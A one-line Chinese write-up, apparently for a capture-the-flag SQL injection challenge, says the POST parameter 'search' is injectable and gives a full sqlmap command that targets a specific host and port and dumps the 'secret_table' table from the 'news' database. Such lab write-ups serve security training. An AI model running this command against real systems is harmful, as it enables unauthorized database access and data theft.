考察sql注入使用sqlmap就可以秒抓包得到post数据:search=payload: sqlmap -u http://220.249.52.134:57902/ --data search=123 -D news -T secret_table --dump-all